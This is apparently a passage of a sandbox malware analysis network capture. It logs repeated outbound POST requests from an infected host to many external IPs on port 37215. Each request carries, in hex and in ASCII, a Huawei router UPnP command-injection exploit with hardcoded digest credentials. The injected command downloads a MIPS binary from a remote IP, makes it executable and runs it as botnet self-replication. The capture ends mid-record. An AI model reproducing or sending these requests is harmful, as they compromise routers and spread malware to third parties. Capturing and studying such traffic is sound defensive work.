                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2429192.168.2.133908041.154.148.13437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.799765110 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2430192.168.2.1346604165.26.199.23537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.799791098 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2431192.168.2.133361841.223.86.6137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.801184893 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2432192.168.2.1344176197.88.142.137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.801369905 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2433192.168.2.135923241.80.31.11237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.801390886 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2434192.168.2.135476241.133.252.1137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.801429033 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2435192.168.2.135367441.186.182.20137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.801446915 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2436192.168.2.135440241.123.247.10037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.802275896 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2437192.168.2.134481641.27.200.14237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.802297115 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2438192.168.2.1337892197.207.95.5537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.802341938 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 